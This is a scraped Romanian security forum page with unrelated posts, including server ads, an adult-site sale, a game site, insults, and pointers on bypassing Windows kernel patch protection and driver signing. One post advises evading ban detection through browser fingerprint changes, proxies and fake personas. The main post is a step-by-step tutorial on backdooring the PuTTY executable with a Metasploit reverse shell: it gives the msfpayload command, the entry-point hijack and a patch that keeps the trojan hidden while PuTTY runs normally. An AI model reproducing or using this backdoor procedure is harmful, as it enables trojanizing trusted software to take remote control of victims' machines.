Leaderboard

Epic!

Depinde de mai multe variabile si ar fi util daca ai da si exemplu de site si ce implica procesul de inregistrare, etc daca vrei sfaturi concrete. Insa de obicei e vorba de pattern. Cateva exemple: - Folosesti acelasi provider de adrese de mail sau altul? (am banat pe un cretin ce isi facea conturi tot de pe @throwam.com) - Completezi field-urile la inregistrare in mod asemanator sau ba - Scrii cu diacritice sau nu - Faci aceleasi greseli de exprimare si scriere sau nu. Iti poti da seama usor de o persoana dupa modul cum scrie. - Intervalul orar cand folosesti site-ul - Rezolutia, OS, browser, versiune Flash, versiune Java si alte detalii ce pot fi vazute live la vizitatorii unui site - Cookies salvate (mai ales Flash cookies) - Entry si Exit links - Folosesc ceva gen evercookies (http://samy.pl/evercookie/) Pentru a nu fi detectat trebuie sa apari ca fiind diferit insa nu foarte diferit ca sa nu bati la ochi (de ex daca intri si scrii in romaneste si apari cu IP de Swaziland si browser Tor). Pentru aceasta trebuie sa iti pui putin creierul la munca sa te gandesti cam cum apare un user "normal" cu care nu au treaba si apoi sa incepi transformarea si sa-ti acoperi pasii. Daca tii atat de mult sa faci parte dintr-o "comunitate" (care nu te vrea... ) poti sa-ti faci o "persona" sau "legend" (daca te-ai uitat la serialul cu Sean Bean) care sa fie cat mai aproape de adevar dar diferita, credibila.

Introduction: Portable Executable (PE) files are very commonly used today. Many people download these files from the internet or get it from a friend and run it on their systems without realizing the dangers involved in running these kind of files. It is very easy to add malicious code to these files and have it executed on the victim’s machine without the victim’s knowledge. Objective: In this article, we would be looking at how to backdoor a Windows executable file. We will be using the popular putty executable and backdoor it with a reverse shell. The Objective is to ensure that the modified putty executable gives a reverse shell back to the attacker’s machine and at the same time continues to function normally without any issues. We would not be using any kind of automated tools to backdoor this putty executable. However, we will be doing this manually to understand how this entire process works. Limitations: To follow the steps in this article, it is important to have basic knowledge of assembly language and a general familiarity with a Debugger (we will be using Immunity in this case) and its usage. Analysis: 1) We will be injecting our malicious reverse shellcode into the putty executable. To do this first, we need to add the malicious code to the putty executable. This code can be placed directly in the executable (provided there is enough space) via a debugger otherwise; we can use a PE Editor tool (like Lord PE) to add a new section to the putty executable which can be used to place our shellcode in the binary. I will be using the PE Editor tool to add a new section to the executable 2) We will open up the putty executable in the Lord PE tool and add a new section header to it. After adding a new section header, we will select the New Section header (NewSec) and hit the edit section header option. At this point, we will add 1000 bytes to the Virtual Size and the Raw Size of the executable. Also, we will click on the flags options and ensure that this newly added section is marked as “Executable as code.” We will save the changes made to the putty executable. 2) Now if we try to launch the executable, we will get an error telling us that this executable is not a valid binary file. Rightly so, since we have added a new section to the binary and left it empty. So now we will use a hex-editor to add the extra 1000 bytes to the binary. We will open the executable file in a hex editor (like XVI32) and insert a hex string of 1000 \x90 instructions at the end of the file. We will save the file and verify that the putty executable is now working fine. 3) Now that we have added extra space for our code. It is time to add our malicious reverse shellcode in this space. Before we do this, we have to hijack the entry point of the program and then redirect the execution of the putty executable to the newly added space which holds the shellcode and after executing the shellcode, we will redirect the flow back to the normal execution of the program. The Below diagram will give a clear picture of what we intend to do: 4) So let us start by hijacking the entry point of the program. At this point, we will load the putty executable in the immunity debugger and make a note of the entry points of the program. The entry point instructions of the putty executable are:- 004550F0 > $ 6A 60 PUSH 60 004550F2 . 68 08814700 PUSH putty.00478108 004550F7 . E8 08210000 CALL putty.00457204 004550FC . BF 94000000 MOV EDI,94 00455101 . 8BC7 MOV EAX,EDI We will hijack the entry point by overwriting the third instruction with a redirection to our malicious code. 5) Next, we have to search for the address of our newly added section (which will hold the malicious code) in the putty executable file. To do this simply hit the “M” tab at the top in immunity debugger. This will open up the memory map of the program where the name and the address of the newly added section can be viewed. In my case, the newly added section starts at this address: 00485BB0 6) So now we proceed to hijack the entry point of the program by overwriting the third instruction with a JMP instruction to the address of the newly added section. (i.e.,. 00485BB0). We will refer to this newly added section as the Code-Cave (since it will hold our malicious code) After having made the changes, we will select the changes we have made and do a right click and select the option to Copy to Executable. Then save this file and rename it as Putty01.exe 7) We now open this new file Putty01.exe in the debugger and then step through (by pressing the F7 button) the initial instructions and then take a JMP to the code cave. 8) From this point onwards we are free to write our code in the putty executable. Before we start writing our shellcode, we will have to save the current state of registers and flags. We can do this with the following two instructions: PUSHAD PUSHFD Also, we have to make a note of the Address of the ESP Register since we would have to realign the position of the ESP register back to this original address after writing the shellcode. The value of the ESP at the time of saving the registers and flags is 0012FFA0. 9) The Next step will be to create a Metasploit generated shellcode. This shellcode should be in hex format so we can copy it to the debugger directly. I have used the following command to generate the shellcode: msfpayload windows/shell_reverse_tcp LHOST=192.168.11.151 LPORT=443 EXITFUNC=seh R | hexdump -C | sed ‘$d’ | cut -d’ ‘ -f3-19 | tr -d ‘ ‘ | tr -d ‘\n’ We copy this Metasploit generated shellcode and paste it directly after the register saving instructions in the immunity debugger. Make sure you select a large number of NOP instruction to ensure that entire shellcode is pasted properly, and no part is missing. 10) Now that we have pasted the shellcode let us go ahead and select all the changes we have made to the binary and copy it to an executable. Then save the file and rename it as Putty02.exe 11) Now let us open the putty executable and step through the instructions (by pressing F7) and let us place a breakpoint (by pressing F2) at the NOP instruction after the end of the shellcode. At this breakpoint make a note of the address of the ESP Register. In my case, the value of the ESP Register is 0012FDA8. We have to restore the value of ESP to its original state which is 0012FFA0. Hence, we subtract the current value of ESP with its original value. (i.e.,. 0012FFA0-0012FDA8=1F8). This means that this value 1F8 when added to the current register 0012FDA8 will reset it to 0012FFA0 thus restoring ESP back to its original address. We will add 1F8 to the ESP register to restore it back to its original state. ADD ESP,1F8. 12) Now we will have to restore back the current state of registers and flags which we had saved earlier. We will use the following instructions to do this:- POPFD POPAD After this, we will redirect the control flow of the program to its normal execution. We will call the instruction which we had overwritten and then JMP to the next instruction. CALL 00457204 JMP 004550FC This will ensure that the normal flow of the program continues and the putty executable opens without any issues. 13) Now we can again select all the changes we have made and copy them to Executable. Then save the file and rename it as Putty03.exe. Now if we set up a listener and launch the program, we will be able to get the reverse shell connection back from the putty executable. However, the putty executable file never launches. In fact only after we exit from the reverse shell, the putty executable opens up. This obviously is not an ideal scenario for any attack to be successful. 14) If we further examine the reverse shellcode carefully, we would notice that the program stops execution on the “WaitforSingleObject” method. This is because the Metasploit generated shellcode passes an argument of “-1” to this method which effectively tells the putty executable to stop the execution till the reverse shell is not terminated. What we have to do to avoid this is to find the instruction which passes the “-1” argument and change its value. In my case, the DEC ESI, PUSH ESI, and INC ESI instructions are responsible for passing the “-1” argument. What this instruction set does is that it decreases ESI from 00000000 (0) to FFFFFFFF (-1) then pushes it, essentially a PUSH -1 instruction, and increases it back to 00000000 (0) To ensure that the “-1” argument is not passed, I had to simply convert the instructions “DEC ESI” & “INC ESI” to “NOP” and then select all the changes made and copy them to executables. Then save the file and rename it as Putty04.exe 15) Now we can launch the Putty executable and set up a listener and successfully catch the reverse shell without any issues. Conclusion: We can see that back-dooring PE Executable on Windows is not a very challenging task. Hence, it is highly advisable to avoid running executable from unknown sources without properly verifying what it is doing Sursa: http://resources.infosecinstitute.com/back-dooring-pe-files-windows/

Cate ceva legat de vulnerabilitatile web "clasice", am scris eu acum multi ani, poate iti e util: http://dgaspcsm.ro/Vulnerabilitati Web si securizarea.pdf Pentru altele, vezi OWASP Testing Guide.

Servere dedicate la preturi bune. Config 1: Haswell Intel CPU Intel i5-4570 @ 3.2 Ghz 4 Core, 4 Threads, 6MB L2 Cache 16 GB DDR3 Memory 1 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS) Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 60 euro Setup fee: 65 euro Config 2: Haswell Intel CPU Intel i5-4570 @ 3.2 Ghz 4 Core, 4 Threads, 6MB L2 Cache 32 GB DDR3 Memory 2 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS) Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 88 euro Setup fee: 65 euro Config 3: Haswell Intel CPU Intel i7-4770 @ 3.4 Ghz 4 Core, 8 Threads, 6MB L2 Cache 32 GB DDR3 Memory 1 x 2 TB SATA3 Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 110 euro Setup fee: 65 euro Config 4: Haswell Intel CPU Intel i7-4770 @ 3.4 Ghz 4 Core, 8 Threads, 6MB L2 Cache 32 GB DDR3 Memory 2 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS) Raid 1 Hardware controller (Adaptec/3Ware) Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 130 euro Setup fee: 65 euro Config 5: Haswell Intel CPU Xeon E3-1230 @ 3.2 Ghz 4 Core, 8 Threads, 8MB L2 Cache 16 GB DDR3 Memory 2 x 2TB eSATA Enterprise Raid 1 Hardware controller (Adaptec/3Ware) Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 150 euro Setup fee: 65 euro Config 6: Haswell Intel CPU Xeon E3-1230 @ 3.2 Ghz 4 Core, 8 Threads, 8MB L2 Cache 32 GB DDR3 Memory 4 x 2TB SATA3 Raid 10 Hardware controller (Adaptec/3Ware Monthly traffic: 20 TB Network Port Speed: 100Mbps (upgrade to 1Gbps for just +20 euro per month) 2 IP Addresses included with custom reverse DNS Monthly cost: 200 euro Setup fee: 65 euro Note: - Latimea de banda este garantata catre orice destinatie (EU/US/Asia) / Avem peer-uri private cu peste 300 de furnizori. Cu tot ce nu este peer, iesim cu conexiune prin Level3, Cogent, Telia, Hurricane Electric si NTT. De asemenea, pe BGP folosim solutiile Noction (in caz ca exista loss pe o routa aleasa de BGP, se comuta pe o alta) - Nu se accepta child porn/spam/scan/phishing/fraude - Serverele sunt activate in aproximativ 3 zile de la efectuarea platii - Adresele IP alocate sunt de Germania. - Plata se poate face prin PayPal. - Se poate face contract daca este necesar. - Preturile de mai sus sunt finale si nu se mai adauga TVA sau altceva la ele. - La cerere, se poate instala pe servere apache, php, mysql, nginx. De asemenea, se poate face si un tuning initial pe langa instalare. (nu au cost aditional) - Consultanta si suport tehnic premium pentru tot ce se mananca cu linux. (atat telefonic cat si pe email) - Pe langa serverele prezentate, avem toata gama de la HP (de la HP DL120 pana la DL980), dar e clar ca acolo sunt alte costuri pentru ca nu se incadreaza la categoria 'low end/cost' - Cine vrea sa reinchirieze serverele, putem colabora si putem face alte preturi. (discutam) - OS-uri: Orice distributie de linux, FreeBSD, NetBSD, OpenBSD, Solaris. Momentan nu avem Windows pentru ca acestea au un cost ridicat de licentiere si nu oferim suport tehnic pentru asa ceva ;-) Cei interesati sunt rugati sa dea un mesaj privat. La nevoie, pot sa va sun personal pentru a va da mai multe detalii. wget tests (without tcp tuning): root@pluto:~# wget -O /dev/null http://cachefly.cachefly.net/100mb.test --2013-12-15 20:55:24-- http://cachefly.cachefly.net/100mb.test Resolving cachefly.cachefly.net (cachefly.cachefly.net)... 205.234.175.175 Connecting to cachefly.cachefly.net (cachefly.cachefly.net)|205.234.175.175|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 104857600 (100M) [application/octet-stream] Saving to: `/dev/null' 100%[===============================>] 104,857,600 94.9M/s in 1.1s 2013-12-15 20:55:25 (94.9 MB/s) - `/dev/null' saved [104857600/104857600] root@pluto:~# wget -O /dev/null http://mirror.de.leaseweb.net/speedtest/100mb.bin --2013-12-15 20:56:13-- http://mirror.de.leaseweb.net/speedtest/100mb.bin Resolving mirror.de.leaseweb.net (mirror.de.leaseweb.net)... 46.165.198.1, 2a00:c98:2010:1:1:face:d06:f00d Connecting to mirror.de.leaseweb.net (mirror.de.leaseweb.net)|46.165.198.1|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 100000000 (95M) [application/octet-stream] Saving to: `/dev/null' 100%[===============================>] 100,000,000 64.3M/s in 1.5s 2013-12-15 20:56:14 (64.3 MB/s) - `/dev/null' saved [100000000/100000000] root@pluto:~# wget -O /dev/null http://mirror.leaseweb.com/speedtest/100mb.bin --2013-12-15 20:56:20-- http://mirror.leaseweb.com/speedtest/100mb.bin Resolving mirror.leaseweb.com (mirror.leaseweb.com)... 94.75.223.121, 2001:1af8:4030:1:0:dead:beef:cafe Connecting to mirror.leaseweb.com (mirror.leaseweb.com)|94.75.223.121|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 100000000 (95M) [application/octet-stream] Saving to: `/dev/null' 100%[===============================>] 100,000,000 78.0M/s in 1.2s 2013-12-15 20:56:22 (78.0 MB/s) - `/dev/null' saved [100000000/100000000] root@pluto:~# wget -O /dev/null http://ftp.iasi.roedu.net/mirrors/centos.org/6.5/isos/x86_64/CentOS-6.5-x86_64-bin-DVD2.iso --2014-01-28 00:30:34-- http://ftp.iasi.roedu.net/mirrors/centos.org/6.5/isos/x86_64/CentOS-6.5-x86_64-bin-DVD2.iso Resolving ftp.iasi.roedu.net (ftp.iasi.roedu.net)... 81.180.250.146, 2001:b30:1::146 Connecting to ftp.iasi.roedu.net (ftp.iasi.roedu.net)|81.180.250.146|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1284395008 (1.2G) [application/octet-stream] Saving to: `/dev/null' 43% [================================> ] 554,423,034 103M/s eta 9s ^C root@pluto:~# wget -O /dev/null http://mirror.nl.leaseweb.net/speedtest/10000mb.bin -4 --2014-02-24 23:07:19-- http://mirror.nl.leaseweb.net/speedtest/10000mb.bin Resolving mirror.nl.leaseweb.net (mirror.nl.leaseweb.net)... 94.75.223.121 Connecting to mirror.nl.leaseweb.net (mirror.nl.leaseweb.net)|94.75.223.121|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 10000000000 (9.3G) [application/octet-stream] Saving to: `/dev/null' 5% [====> ] 511,839,952 108M/s eta 91s ^C root@pluto:~# hdparm test pe un server cu SSD Force3: root@ns:~# hdparm -t --direct /dev/sda1 /dev/sda1: Timing O_DIRECT disk reads: 284 MB in 0.56 seconds = 509.85 MB/sec root@ns:~# hdparm -T /dev/sda1 /dev/sda1: Timing cached reads: 27844 MB in 2.00 seconds = 13940.39 MB/sec root@ns:~#

Vand site adult. - domeniu Februarie 2017 - cod sursa scris de mine de la 0 - deschis in Iunie 2016. Fara vizite prea multe, dar cu potential. Eu nu am timp de el si platesc hostul degeaba. Detalii in privat. EDIT: Ca sa evitam unele dialoguri - siteul are 20k vizite unice din iunie pana acum - i-am facut reclama doar pe 9gag - este pe bootstrap (si admin si site). site-ul este responsive - se pot adauga gifuri / linkuri catre video (automat si manual). - este un concept nou. eu cel putin n-am mai vazut un site similar - nu este un simplu listing de video EDIT 2: Site-ul se vinde cu domeniu, host (este deja configurat, DigitalOcean), conturi de mail (gmail, proton), cont de hubtraffic, analytics, webmastertools, etc ce o mai fi. * iunie adica 28 iunie..

Wtf man? Protecția copilului Satu Mare?

Am primit prin pm multe detalii despre site.Desi nu e ce vroiam,in sensul ca nu e un site clasic xxx,totusi ideea e geniala,parerea mea.E vorba de interactiunea dintre vizitatori in acest domeniu.Cred ca daca cineva investeste in promovare la un nivel mai inalt,poate da lovitura.

Don't give up your suicide!

Dedicated server with Intel Skylake CPU Intel Core i-3 6100 @ 3.7 Ghz 2 Core, 4 Threads, 3MB Smart Cache 32 GB DDR4 Memory 1 x 240 GB SSD Force 3 (6Gb/s, 85.000 IOPS) 100 Mbps Guaranteed Upstream Speed Unmetered bandwidth Premium infrastructure network 1 IP Address included with reverse DNS Unlimited Free OS Reloads 24/7 Technical Support Delivery: In Stock (24-72 hours) Hardware Firewall / DDoS Protection Monthly: 42 gbp / Setup fee: 0

1. Poate ai o locatie mai deosebita si sta sa verifice de unde este fiecare nou venit pe site. Incearca cu proxy. 2. Incearca sa faci doar cont fara activitate. Poate tocmai activitatea (personalitatea) te da de gol

Sa va dau la muie cu mizeriile voastre. TC

Last useful stuff I saw on this subject was this one: http://blog.ptsecurity.com/2014/09/microsoft-windows-81-kernel-patch.html And you should also check this: https://github.com/hfiref0x/TDL However, I think they are working from time to time on this, so even if some bypasses are found, they are "probably" fixed. Also, you should take in consideration from here: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/driver-signing Note Windows 10 for desktop editions (Home, Pro, Enterprise, and Education) and Windows Server 2016 kernel-mode drivers must be signed by the Windows Hardware Dev Center Dashboard, which requires an EV certificate. For details, see Driver Signing Changes in Windows 10. Also, check this: https://msdn.microsoft.com/en-us/windows/hardware/drivers/install/kernel-mode-code-signing-policy--windows-vista-and-later- Tools: https://github.com/tandasat/PgResarch and https://github.com/tandasat/findpg

CyberChef - The Cyber Swiss Army Knife

E de la tine, baga-i benzina de calitate.

Incepi prin a nu mai fii prost. In primul rand te prinde dupa calasa ip-ului. La realocarea unui nou ip se modifica ultimele 2 grupe.

Salut! Ma numesc Andrei si vreau sa va prezint site-ul meu! www.jocuri.cf este un site game-arcade facut de mine(nu si tema si jocurile). O mare parte din jocuri au fost publicate prin intermediul MyArcadePlugin lite. Site-ul nu este 100% facut, de aceea va cer parerea. P.S.:Mai am de pus multe jocuri, si sa traduc descrierile fiecaruia. Sa continui sau nu?